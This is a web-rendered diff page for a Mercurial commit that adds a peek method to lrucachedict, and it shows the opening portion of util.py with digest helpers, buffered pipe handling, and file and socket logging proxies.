##// END OF EJS Templates
util: add method to peek item in lrucachedict...
Yuya Nishihara -
r40915:0c638ff6 default
parent child Browse files
Show More
@@ -1,3987 +1,4001
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 readlink = platform.readlink
116 116 rename = platform.rename
117 117 removedirs = platform.removedirs
118 118 samedevice = platform.samedevice
119 119 samefile = platform.samefile
120 120 samestat = platform.samestat
121 121 setflags = platform.setflags
122 122 split = platform.split
123 123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 124 statisexec = platform.statisexec
125 125 statislink = platform.statislink
126 126 umask = platform.umask
127 127 unlink = platform.unlink
128 128 username = platform.username
129 129
130 130 try:
131 131 recvfds = osutil.recvfds
132 132 except AttributeError:
133 133 pass
134 134
135 135 # Python compatibility
136 136
137 137 _notset = object()
138 138
139 139 def bitsfrom(container):
140 140 bits = 0
141 141 for bit in container:
142 142 bits |= bit
143 143 return bits
144 144
145 145 # python 2.6 still have deprecation warning enabled by default. We do not want
146 146 # to display anything to standard user so detect if we are running test and
147 147 # only use python deprecation warning in this case.
148 148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 149 if _dowarn:
150 150 # explicitly unfilter our warning for python 2.7
151 151 #
152 152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 153 # However, module name set through PYTHONWARNINGS was exactly matched, so
154 154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
155 155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
158 158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 159 if _dowarn and pycompat.ispy3:
160 160 # silence warning emitted by passing user string to re.sub()
161 161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 162 r'mercurial')
163 163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 164 DeprecationWarning, r'mercurial')
165 165 # TODO: reinvent imp.is_frozen()
166 166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 167 DeprecationWarning, r'mercurial')
168 168
169 169 def nouideprecwarn(msg, version, stacklevel=1):
170 170 """Issue an python native deprecation warning
171 171
172 172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 173 """
174 174 if _dowarn:
175 175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 176 " update your code.)") % version
177 177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178 178
179 179 DIGESTS = {
180 180 'md5': hashlib.md5,
181 181 'sha1': hashlib.sha1,
182 182 'sha512': hashlib.sha512,
183 183 }
184 184 # List of digest types from strongest to weakest
185 185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186 186
187 187 for k in DIGESTS_BY_STRENGTH:
188 188 assert k in DIGESTS
189 189
190 190 class digester(object):
191 191 """helper to compute digests.
192 192
193 193 This helper can be used to compute one or more digests given their name.
194 194
195 195 >>> d = digester([b'md5', b'sha1'])
196 196 >>> d.update(b'foo')
197 197 >>> [k for k in sorted(d)]
198 198 ['md5', 'sha1']
199 199 >>> d[b'md5']
200 200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 201 >>> d[b'sha1']
202 202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 203 >>> digester.preferred([b'md5', b'sha1'])
204 204 'sha1'
205 205 """
206 206
207 207 def __init__(self, digests, s=''):
208 208 self._hashes = {}
209 209 for k in digests:
210 210 if k not in DIGESTS:
211 211 raise error.Abort(_('unknown digest type: %s') % k)
212 212 self._hashes[k] = DIGESTS[k]()
213 213 if s:
214 214 self.update(s)
215 215
216 216 def update(self, data):
217 217 for h in self._hashes.values():
218 218 h.update(data)
219 219
220 220 def __getitem__(self, key):
221 221 if key not in DIGESTS:
222 222 raise error.Abort(_('unknown digest type: %s') % k)
223 223 return nodemod.hex(self._hashes[key].digest())
224 224
225 225 def __iter__(self):
226 226 return iter(self._hashes)
227 227
228 228 @staticmethod
229 229 def preferred(supported):
230 230 """returns the strongest digest type in both supported and DIGESTS."""
231 231
232 232 for k in DIGESTS_BY_STRENGTH:
233 233 if k in supported:
234 234 return k
235 235 return None
236 236
237 237 class digestchecker(object):
238 238 """file handle wrapper that additionally checks content against a given
239 239 size and digests.
240 240
241 241 d = digestchecker(fh, size, {'md5': '...'})
242 242
243 243 When multiple digests are given, all of them are validated.
244 244 """
245 245
246 246 def __init__(self, fh, size, digests):
247 247 self._fh = fh
248 248 self._size = size
249 249 self._got = 0
250 250 self._digests = dict(digests)
251 251 self._digester = digester(self._digests.keys())
252 252
253 253 def read(self, length=-1):
254 254 content = self._fh.read(length)
255 255 self._digester.update(content)
256 256 self._got += len(content)
257 257 return content
258 258
259 259 def validate(self):
260 260 if self._size != self._got:
261 261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 262 (self._size, self._got))
263 263 for k, v in self._digests.items():
264 264 if v != self._digester[k]:
265 265 # i18n: first parameter is a digest name
266 266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 267 (k, v, self._digester[k]))
268 268
269 269 try:
270 270 buffer = buffer
271 271 except NameError:
272 272 def buffer(sliceable, offset=0, length=None):
273 273 if length is not None:
274 274 return memoryview(sliceable)[offset:offset + length]
275 275 return memoryview(sliceable)[offset:]
276 276
277 277 _chunksize = 4096
278 278
279 279 class bufferedinputpipe(object):
280 280 """a manually buffered input pipe
281 281
282 282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 283 the same time. We cannot probe the buffer state and select will not detect
284 284 that data are ready to read if they are already buffered.
285 285
286 286 This class let us work around that by implementing its own buffering
287 287 (allowing efficient readline) while offering a way to know if the buffer is
288 288 empty from the output (allowing collaboration of the buffer with polling).
289 289
290 290 This class lives in the 'util' module because it makes use of the 'os'
291 291 module from the python stdlib.
292 292 """
293 293 def __new__(cls, fh):
294 294 # If we receive a fileobjectproxy, we need to use a variation of this
295 295 # class that notifies observers about activity.
296 296 if isinstance(fh, fileobjectproxy):
297 297 cls = observedbufferedinputpipe
298 298
299 299 return super(bufferedinputpipe, cls).__new__(cls)
300 300
301 301 def __init__(self, input):
302 302 self._input = input
303 303 self._buffer = []
304 304 self._eof = False
305 305 self._lenbuf = 0
306 306
307 307 @property
308 308 def hasbuffer(self):
309 309 """True is any data is currently buffered
310 310
311 311 This will be used externally a pre-step for polling IO. If there is
312 312 already data then no polling should be set in place."""
313 313 return bool(self._buffer)
314 314
315 315 @property
316 316 def closed(self):
317 317 return self._input.closed
318 318
319 319 def fileno(self):
320 320 return self._input.fileno()
321 321
322 322 def close(self):
323 323 return self._input.close()
324 324
325 325 def read(self, size):
326 326 while (not self._eof) and (self._lenbuf < size):
327 327 self._fillbuffer()
328 328 return self._frombuffer(size)
329 329
330 330 def unbufferedread(self, size):
331 331 if not self._eof and self._lenbuf == 0:
332 332 self._fillbuffer(max(size, _chunksize))
333 333 return self._frombuffer(min(self._lenbuf, size))
334 334
335 335 def readline(self, *args, **kwargs):
336 336 if len(self._buffer) > 1:
337 337 # this should not happen because both read and readline end with a
338 338 # _frombuffer call that collapse it.
339 339 self._buffer = [''.join(self._buffer)]
340 340 self._lenbuf = len(self._buffer[0])
341 341 lfi = -1
342 342 if self._buffer:
343 343 lfi = self._buffer[-1].find('\n')
344 344 while (not self._eof) and lfi < 0:
345 345 self._fillbuffer()
346 346 if self._buffer:
347 347 lfi = self._buffer[-1].find('\n')
348 348 size = lfi + 1
349 349 if lfi < 0: # end of file
350 350 size = self._lenbuf
351 351 elif len(self._buffer) > 1:
352 352 # we need to take previous chunks into account
353 353 size += self._lenbuf - len(self._buffer[-1])
354 354 return self._frombuffer(size)
355 355
356 356 def _frombuffer(self, size):
357 357 """return at most 'size' data from the buffer
358 358
359 359 The data are removed from the buffer."""
360 360 if size == 0 or not self._buffer:
361 361 return ''
362 362 buf = self._buffer[0]
363 363 if len(self._buffer) > 1:
364 364 buf = ''.join(self._buffer)
365 365
366 366 data = buf[:size]
367 367 buf = buf[len(data):]
368 368 if buf:
369 369 self._buffer = [buf]
370 370 self._lenbuf = len(buf)
371 371 else:
372 372 self._buffer = []
373 373 self._lenbuf = 0
374 374 return data
375 375
376 376 def _fillbuffer(self, size=_chunksize):
377 377 """read data to the buffer"""
378 378 data = os.read(self._input.fileno(), size)
379 379 if not data:
380 380 self._eof = True
381 381 else:
382 382 self._lenbuf += len(data)
383 383 self._buffer.append(data)
384 384
385 385 return data
386 386
387 387 def mmapread(fp):
388 388 try:
389 389 fd = getattr(fp, 'fileno', lambda: fp)()
390 390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 391 except ValueError:
392 392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 393 # if the file is empty, and if so, return an empty buffer.
394 394 if os.fstat(fd).st_size == 0:
395 395 return ''
396 396 raise
397 397
398 398 class fileobjectproxy(object):
399 399 """A proxy around file objects that tells a watcher when events occur.
400 400
401 401 This type is intended to only be used for testing purposes. Think hard
402 402 before using it in important code.
403 403 """
404 404 __slots__ = (
405 405 r'_orig',
406 406 r'_observer',
407 407 )
408 408
409 409 def __init__(self, fh, observer):
410 410 object.__setattr__(self, r'_orig', fh)
411 411 object.__setattr__(self, r'_observer', observer)
412 412
413 413 def __getattribute__(self, name):
414 414 ours = {
415 415 r'_observer',
416 416
417 417 # IOBase
418 418 r'close',
419 419 # closed if a property
420 420 r'fileno',
421 421 r'flush',
422 422 r'isatty',
423 423 r'readable',
424 424 r'readline',
425 425 r'readlines',
426 426 r'seek',
427 427 r'seekable',
428 428 r'tell',
429 429 r'truncate',
430 430 r'writable',
431 431 r'writelines',
432 432 # RawIOBase
433 433 r'read',
434 434 r'readall',
435 435 r'readinto',
436 436 r'write',
437 437 # BufferedIOBase
438 438 # raw is a property
439 439 r'detach',
440 440 # read defined above
441 441 r'read1',
442 442 # readinto defined above
443 443 # write defined above
444 444 }
445 445
446 446 # We only observe some methods.
447 447 if name in ours:
448 448 return object.__getattribute__(self, name)
449 449
450 450 return getattr(object.__getattribute__(self, r'_orig'), name)
451 451
452 452 def __nonzero__(self):
453 453 return bool(object.__getattribute__(self, r'_orig'))
454 454
455 455 __bool__ = __nonzero__
456 456
457 457 def __delattr__(self, name):
458 458 return delattr(object.__getattribute__(self, r'_orig'), name)
459 459
460 460 def __setattr__(self, name, value):
461 461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462 462
463 463 def __iter__(self):
464 464 return object.__getattribute__(self, r'_orig').__iter__()
465 465
466 466 def _observedcall(self, name, *args, **kwargs):
467 467 # Call the original object.
468 468 orig = object.__getattribute__(self, r'_orig')
469 469 res = getattr(orig, name)(*args, **kwargs)
470 470
471 471 # Call a method on the observer of the same name with arguments
472 472 # so it can react, log, etc.
473 473 observer = object.__getattribute__(self, r'_observer')
474 474 fn = getattr(observer, name, None)
475 475 if fn:
476 476 fn(res, *args, **kwargs)
477 477
478 478 return res
479 479
480 480 def close(self, *args, **kwargs):
481 481 return object.__getattribute__(self, r'_observedcall')(
482 482 r'close', *args, **kwargs)
483 483
484 484 def fileno(self, *args, **kwargs):
485 485 return object.__getattribute__(self, r'_observedcall')(
486 486 r'fileno', *args, **kwargs)
487 487
488 488 def flush(self, *args, **kwargs):
489 489 return object.__getattribute__(self, r'_observedcall')(
490 490 r'flush', *args, **kwargs)
491 491
492 492 def isatty(self, *args, **kwargs):
493 493 return object.__getattribute__(self, r'_observedcall')(
494 494 r'isatty', *args, **kwargs)
495 495
496 496 def readable(self, *args, **kwargs):
497 497 return object.__getattribute__(self, r'_observedcall')(
498 498 r'readable', *args, **kwargs)
499 499
500 500 def readline(self, *args, **kwargs):
501 501 return object.__getattribute__(self, r'_observedcall')(
502 502 r'readline', *args, **kwargs)
503 503
504 504 def readlines(self, *args, **kwargs):
505 505 return object.__getattribute__(self, r'_observedcall')(
506 506 r'readlines', *args, **kwargs)
507 507
508 508 def seek(self, *args, **kwargs):
509 509 return object.__getattribute__(self, r'_observedcall')(
510 510 r'seek', *args, **kwargs)
511 511
512 512 def seekable(self, *args, **kwargs):
513 513 return object.__getattribute__(self, r'_observedcall')(
514 514 r'seekable', *args, **kwargs)
515 515
516 516 def tell(self, *args, **kwargs):
517 517 return object.__getattribute__(self, r'_observedcall')(
518 518 r'tell', *args, **kwargs)
519 519
520 520 def truncate(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'truncate', *args, **kwargs)
523 523
524 524 def writable(self, *args, **kwargs):
525 525 return object.__getattribute__(self, r'_observedcall')(
526 526 r'writable', *args, **kwargs)
527 527
528 528 def writelines(self, *args, **kwargs):
529 529 return object.__getattribute__(self, r'_observedcall')(
530 530 r'writelines', *args, **kwargs)
531 531
532 532 def read(self, *args, **kwargs):
533 533 return object.__getattribute__(self, r'_observedcall')(
534 534 r'read', *args, **kwargs)
535 535
536 536 def readall(self, *args, **kwargs):
537 537 return object.__getattribute__(self, r'_observedcall')(
538 538 r'readall', *args, **kwargs)
539 539
540 540 def readinto(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'readinto', *args, **kwargs)
543 543
544 544 def write(self, *args, **kwargs):
545 545 return object.__getattribute__(self, r'_observedcall')(
546 546 r'write', *args, **kwargs)
547 547
548 548 def detach(self, *args, **kwargs):
549 549 return object.__getattribute__(self, r'_observedcall')(
550 550 r'detach', *args, **kwargs)
551 551
552 552 def read1(self, *args, **kwargs):
553 553 return object.__getattribute__(self, r'_observedcall')(
554 554 r'read1', *args, **kwargs)
555 555
556 556 class observedbufferedinputpipe(bufferedinputpipe):
557 557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558 558
559 559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 560 bypass ``fileobjectproxy``. Because of this, we need to make
561 561 ``bufferedinputpipe`` aware of these operations.
562 562
563 563 This variation of ``bufferedinputpipe`` can notify observers about
564 564 ``os.read()`` events. It also re-publishes other events, such as
565 565 ``read()`` and ``readline()``.
566 566 """
567 567 def _fillbuffer(self):
568 568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569 569
570 570 fn = getattr(self._input._observer, r'osread', None)
571 571 if fn:
572 572 fn(res, _chunksize)
573 573
574 574 return res
575 575
576 576 # We use different observer methods because the operation isn't
577 577 # performed on the actual file object but on us.
578 578 def read(self, size):
579 579 res = super(observedbufferedinputpipe, self).read(size)
580 580
581 581 fn = getattr(self._input._observer, r'bufferedread', None)
582 582 if fn:
583 583 fn(res, size)
584 584
585 585 return res
586 586
587 587 def readline(self, *args, **kwargs):
588 588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589 589
590 590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 591 if fn:
592 592 fn(res)
593 593
594 594 return res
595 595
596 596 PROXIED_SOCKET_METHODS = {
597 597 r'makefile',
598 598 r'recv',
599 599 r'recvfrom',
600 600 r'recvfrom_into',
601 601 r'recv_into',
602 602 r'send',
603 603 r'sendall',
604 604 r'sendto',
605 605 r'setblocking',
606 606 r'settimeout',
607 607 r'gettimeout',
608 608 r'setsockopt',
609 609 }
610 610
611 611 class socketproxy(object):
612 612 """A proxy around a socket that tells a watcher when events occur.
613 613
614 614 This is like ``fileobjectproxy`` except for sockets.
615 615
616 616 This type is intended to only be used for testing purposes. Think hard
617 617 before using it in important code.
618 618 """
619 619 __slots__ = (
620 620 r'_orig',
621 621 r'_observer',
622 622 )
623 623
624 624 def __init__(self, sock, observer):
625 625 object.__setattr__(self, r'_orig', sock)
626 626 object.__setattr__(self, r'_observer', observer)
627 627
628 628 def __getattribute__(self, name):
629 629 if name in PROXIED_SOCKET_METHODS:
630 630 return object.__getattribute__(self, name)
631 631
632 632 return getattr(object.__getattribute__(self, r'_orig'), name)
633 633
634 634 def __delattr__(self, name):
635 635 return delattr(object.__getattribute__(self, r'_orig'), name)
636 636
637 637 def __setattr__(self, name, value):
638 638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639 639
640 640 def __nonzero__(self):
641 641 return bool(object.__getattribute__(self, r'_orig'))
642 642
643 643 __bool__ = __nonzero__
644 644
645 645 def _observedcall(self, name, *args, **kwargs):
646 646 # Call the original object.
647 647 orig = object.__getattribute__(self, r'_orig')
648 648 res = getattr(orig, name)(*args, **kwargs)
649 649
650 650 # Call a method on the observer of the same name with arguments
651 651 # so it can react, log, etc.
652 652 observer = object.__getattribute__(self, r'_observer')
653 653 fn = getattr(observer, name, None)
654 654 if fn:
655 655 fn(res, *args, **kwargs)
656 656
657 657 return res
658 658
659 659 def makefile(self, *args, **kwargs):
660 660 res = object.__getattribute__(self, r'_observedcall')(
661 661 r'makefile', *args, **kwargs)
662 662
663 663 # The file object may be used for I/O. So we turn it into a
664 664 # proxy using our observer.
665 665 observer = object.__getattribute__(self, r'_observer')
666 666 return makeloggingfileobject(observer.fh, res, observer.name,
667 667 reads=observer.reads,
668 668 writes=observer.writes,
669 669 logdata=observer.logdata,
670 670 logdataapis=observer.logdataapis)
671 671
672 672 def recv(self, *args, **kwargs):
673 673 return object.__getattribute__(self, r'_observedcall')(
674 674 r'recv', *args, **kwargs)
675 675
676 676 def recvfrom(self, *args, **kwargs):
677 677 return object.__getattribute__(self, r'_observedcall')(
678 678 r'recvfrom', *args, **kwargs)
679 679
680 680 def recvfrom_into(self, *args, **kwargs):
681 681 return object.__getattribute__(self, r'_observedcall')(
682 682 r'recvfrom_into', *args, **kwargs)
683 683
684 684 def recv_into(self, *args, **kwargs):
685 685 return object.__getattribute__(self, r'_observedcall')(
686 686 r'recv_info', *args, **kwargs)
687 687
688 688 def send(self, *args, **kwargs):
689 689 return object.__getattribute__(self, r'_observedcall')(
690 690 r'send', *args, **kwargs)
691 691
692 692 def sendall(self, *args, **kwargs):
693 693 return object.__getattribute__(self, r'_observedcall')(
694 694 r'sendall', *args, **kwargs)
695 695
696 696 def sendto(self, *args, **kwargs):
697 697 return object.__getattribute__(self, r'_observedcall')(
698 698 r'sendto', *args, **kwargs)
699 699
700 700 def setblocking(self, *args, **kwargs):
701 701 return object.__getattribute__(self, r'_observedcall')(
702 702 r'setblocking', *args, **kwargs)
703 703
704 704 def settimeout(self, *args, **kwargs):
705 705 return object.__getattribute__(self, r'_observedcall')(
706 706 r'settimeout', *args, **kwargs)
707 707
708 708 def gettimeout(self, *args, **kwargs):
709 709 return object.__getattribute__(self, r'_observedcall')(
710 710 r'gettimeout', *args, **kwargs)
711 711
712 712 def setsockopt(self, *args, **kwargs):
713 713 return object.__getattribute__(self, r'_observedcall')(
714 714 r'setsockopt', *args, **kwargs)
715 715
716 716 class baseproxyobserver(object):
717 717 def _writedata(self, data):
718 718 if not self.logdata:
719 719 if self.logdataapis:
720 720 self.fh.write('\n')
721 721 self.fh.flush()
722 722 return
723 723
724 724 # Simple case writes all data on a single line.
725 725 if b'\n' not in data:
726 726 if self.logdataapis:
727 727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 728 else:
729 729 self.fh.write('%s> %s\n'
730 730 % (self.name, stringutil.escapestr(data)))
731 731 self.fh.flush()
732 732 return
733 733
734 734 # Data with newlines is written to multiple lines.
735 735 if self.logdataapis:
736 736 self.fh.write(':\n')
737 737
738 738 lines = data.splitlines(True)
739 739 for line in lines:
740 740 self.fh.write('%s> %s\n'
741 741 % (self.name, stringutil.escapestr(line)))
742 742 self.fh.flush()
743 743
744 744 class fileobjectobserver(baseproxyobserver):
745 745 """Logs file object activity."""
746 746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 747 logdataapis=True):
748 748 self.fh = fh
749 749 self.name = name
750 750 self.logdata = logdata
751 751 self.logdataapis = logdataapis
752 752 self.reads = reads
753 753 self.writes = writes
754 754
755 755 def read(self, res, size=-1):
756 756 if not self.reads:
757 757 return
758 758 # Python 3 can return None from reads at EOF instead of empty strings.
759 759 if res is None:
760 760 res = ''
761 761
762 762 if size == -1 and res == '':
763 763 # Suppress pointless read(-1) calls that return
764 764 # nothing. These happen _a lot_ on Python 3, and there
765 765 # doesn't seem to be a better workaround to have matching
766 766 # Python 2 and 3 behavior. :(
767 767 return
768 768
769 769 if self.logdataapis:
770 770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771 771
772 772 self._writedata(res)
773 773
774 774 def readline(self, res, limit=-1):
775 775 if not self.reads:
776 776 return
777 777
778 778 if self.logdataapis:
779 779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780 780
781 781 self._writedata(res)
782 782
783 783 def readinto(self, res, dest):
784 784 if not self.reads:
785 785 return
786 786
787 787 if self.logdataapis:
788 788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 789 res))
790 790
791 791 data = dest[0:res] if res is not None else b''
792 792 self._writedata(data)
793 793
794 794 def write(self, res, data):
795 795 if not self.writes:
796 796 return
797 797
798 798 # Python 2 returns None from some write() calls. Python 3 (reasonably)
799 799 # returns the integer bytes written.
800 800 if res is None and data:
801 801 res = len(data)
802 802
803 803 if self.logdataapis:
804 804 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
805 805
806 806 self._writedata(data)
807 807
808 808 def flush(self, res):
809 809 if not self.writes:
810 810 return
811 811
812 812 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
813 813
814 814 # For observedbufferedinputpipe.
815 815 def bufferedread(self, res, size):
816 816 if not self.reads:
817 817 return
818 818
819 819 if self.logdataapis:
820 820 self.fh.write('%s> bufferedread(%d) -> %d' % (
821 821 self.name, size, len(res)))
822 822
823 823 self._writedata(res)
824 824
825 825 def bufferedreadline(self, res):
826 826 if not self.reads:
827 827 return
828 828
829 829 if self.logdataapis:
830 830 self.fh.write('%s> bufferedreadline() -> %d' % (
831 831 self.name, len(res)))
832 832
833 833 self._writedata(res)
834 834
835 835 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
836 836 logdata=False, logdataapis=True):
837 837 """Turn a file object into a logging file object."""
838 838
839 839 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
840 840 logdata=logdata, logdataapis=logdataapis)
841 841 return fileobjectproxy(fh, observer)
842 842
843 843 class socketobserver(baseproxyobserver):
844 844 """Logs socket activity."""
845 845 def __init__(self, fh, name, reads=True, writes=True, states=True,
846 846 logdata=False, logdataapis=True):
847 847 self.fh = fh
848 848 self.name = name
849 849 self.reads = reads
850 850 self.writes = writes
851 851 self.states = states
852 852 self.logdata = logdata
853 853 self.logdataapis = logdataapis
854 854
855 855 def makefile(self, res, mode=None, bufsize=None):
856 856 if not self.states:
857 857 return
858 858
859 859 self.fh.write('%s> makefile(%r, %r)\n' % (
860 860 self.name, mode, bufsize))
861 861
862 862 def recv(self, res, size, flags=0):
863 863 if not self.reads:
864 864 return
865 865
866 866 if self.logdataapis:
867 867 self.fh.write('%s> recv(%d, %d) -> %d' % (
868 868 self.name, size, flags, len(res)))
869 869 self._writedata(res)
870 870
871 871 def recvfrom(self, res, size, flags=0):
872 872 if not self.reads:
873 873 return
874 874
875 875 if self.logdataapis:
876 876 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
877 877 self.name, size, flags, len(res[0])))
878 878
879 879 self._writedata(res[0])
880 880
881 881 def recvfrom_into(self, res, buf, size, flags=0):
882 882 if not self.reads:
883 883 return
884 884
885 885 if self.logdataapis:
886 886 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
887 887 self.name, size, flags, res[0]))
888 888
889 889 self._writedata(buf[0:res[0]])
890 890
891 891 def recv_into(self, res, buf, size=0, flags=0):
892 892 if not self.reads:
893 893 return
894 894
895 895 if self.logdataapis:
896 896 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
897 897 self.name, size, flags, res))
898 898
899 899 self._writedata(buf[0:res])
900 900
901 901 def send(self, res, data, flags=0):
902 902 if not self.writes:
903 903 return
904 904
905 905 self.fh.write('%s> send(%d, %d) -> %d' % (
906 906 self.name, len(data), flags, len(res)))
907 907 self._writedata(data)
908 908
909 909 def sendall(self, res, data, flags=0):
910 910 if not self.writes:
911 911 return
912 912
913 913 if self.logdataapis:
914 914 # Returns None on success. So don't bother reporting return value.
915 915 self.fh.write('%s> sendall(%d, %d)' % (
916 916 self.name, len(data), flags))
917 917
918 918 self._writedata(data)
919 919
920 920 def sendto(self, res, data, flagsoraddress, address=None):
921 921 if not self.writes:
922 922 return
923 923
924 924 if address:
925 925 flags = flagsoraddress
926 926 else:
927 927 flags = 0
928 928
929 929 if self.logdataapis:
930 930 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
931 931 self.name, len(data), flags, address, res))
932 932
933 933 self._writedata(data)
934 934
935 935 def setblocking(self, res, flag):
936 936 if not self.states:
937 937 return
938 938
939 939 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
940 940
941 941 def settimeout(self, res, value):
942 942 if not self.states:
943 943 return
944 944
945 945 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
946 946
947 947 def gettimeout(self, res):
948 948 if not self.states:
949 949 return
950 950
951 951 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
952 952
953 953 def setsockopt(self, res, level, optname, value):
954 954 if not self.states:
955 955 return
956 956
957 957 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
958 958 self.name, level, optname, value, res))
959 959
960 960 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
961 961 logdata=False, logdataapis=True):
962 962 """Turn a socket into a logging socket."""
963 963
964 964 observer = socketobserver(logh, name, reads=reads, writes=writes,
965 965 states=states, logdata=logdata,
966 966 logdataapis=logdataapis)
967 967 return socketproxy(fh, observer)
968 968
969 969 def version():
970 970 """Return version information if available."""
971 971 try:
972 972 from . import __version__
973 973 return __version__.version
974 974 except ImportError:
975 975 return 'unknown'
976 976
977 977 def versiontuple(v=None, n=4):
978 978 """Parses a Mercurial version string into an N-tuple.
979 979
980 980 The version string to be parsed is specified with the ``v`` argument.
981 981 If it isn't defined, the current Mercurial version string will be parsed.
982 982
983 983 ``n`` can be 2, 3, or 4. Here is how some version strings map to
984 984 returned values:
985 985
986 986 >>> v = b'3.6.1+190-df9b73d2d444'
987 987 >>> versiontuple(v, 2)
988 988 (3, 6)
989 989 >>> versiontuple(v, 3)
990 990 (3, 6, 1)
991 991 >>> versiontuple(v, 4)
992 992 (3, 6, 1, '190-df9b73d2d444')
993 993
994 994 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
995 995 (3, 6, 1, '190-df9b73d2d444+20151118')
996 996
997 997 >>> v = b'3.6'
